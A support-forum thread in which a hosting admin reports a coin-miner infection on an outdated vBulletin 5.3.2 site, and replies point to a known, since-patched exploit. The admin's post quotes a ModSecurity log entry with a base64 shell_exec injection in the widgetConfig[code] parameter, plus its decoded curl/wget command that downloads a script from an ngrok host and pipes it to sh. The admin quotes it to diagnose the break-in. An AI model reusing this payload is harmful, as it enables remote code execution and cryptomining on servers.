Announcement

Collapse
No announcement yet.

Not a forum member but wanted to share coin miner virus infection issue

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Not a forum member but wanted to share coin miner virus infection issue

    Hi,

    vBulletin® Version 5.3.2 . We host the site, I do not have the owners login credentials to this forum. Please excuse if this post is inappropriate. That is not my intention.. If we need to repost in your tech form we will contact our customer accordingly for credentials.

    We have been plagued with the Multios.Coinminer.Miner and the Unix.Malware.Agent virii the past few days.
    The vector it is using to infect is a vbulletin site - or so it seems.
    Sample log
    0191018:[Thu Oct 17 18:01:45.891136 2019] [:error] [pid 9510] [client 194.99.105.75] ModSecurity: Warning. Pattern match "\\\\W{4,}" at ARGS:widgetConfig[code].
    [file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"]
    [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');
    found within ARGS:widgetConfig[code]: echo shell_exec('echo KGN1cmwgLW0gMzAgLXNrICdodHRwOi8vNWE1Yjk5OTgubmdyb2suaW8vZi9zZXJ2ZT9sPXYmcj1kZmEzYmNhOGE1MD IwYzNlMjdjZjY4ZjhlZDFjMjJkNycgfHwgd2dldCAtcSAtTy0gImh0dHA6Ly81YTViOTk5OC5uZ3Jvay5pby9mL3Nl cnZlP2w9diZyPWRmYTNiY2E4YTUwMjBjM2UyN2NmNjhmOGVkMWMyMmQ3IiApIHwgc2g=|base64 -d|sh;echo HHKU8JE');

    Decode the base64 string =
    (curl -m 30 -sk 'http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7' || wget -q -O- "http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7" ) | sh

    No question this is the source of the virus infections. I downloaded the code...

    The client ip's change but they all point to only one vbulletin site we host and the time stamps within the website access logs match exactly the virus files and directories creation times.
    Is this a known bug - maybe with widget code in some way and we need to upgrade/patch? Posting before upgrading to see if this is a known issue with our version first.

    Site permissions seem perfect.

    Thank you

    -Nick


  • #2
    vBulletin 5.3.2 is severely outdated and is known to have an exploit which has been patched in the latest version of the software.

    Only the customer who purchased the license has access to the Members Area which is necessary in order to download the patched version of the software.

    Comment


    • #3
      <vBulletin 5.3.2 is severely outdated

      Are you smoking something? Its 3 months old ala that is when vBulletin installed it

      fyi - it would be nice if registered customers be notified when discoveries [easy hacks] like these are made.

      Regardless thank you for your response.

      Comment


      • #4
        Ignore last post. Ooops. It is old!

        Comment


        • #5
          Closing thread as this is not a pre-sales issue.

          VB 5.3.2 is very old and not safe to use. All customers should have upgraded by now.

          Comment

          widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
          Working...
          X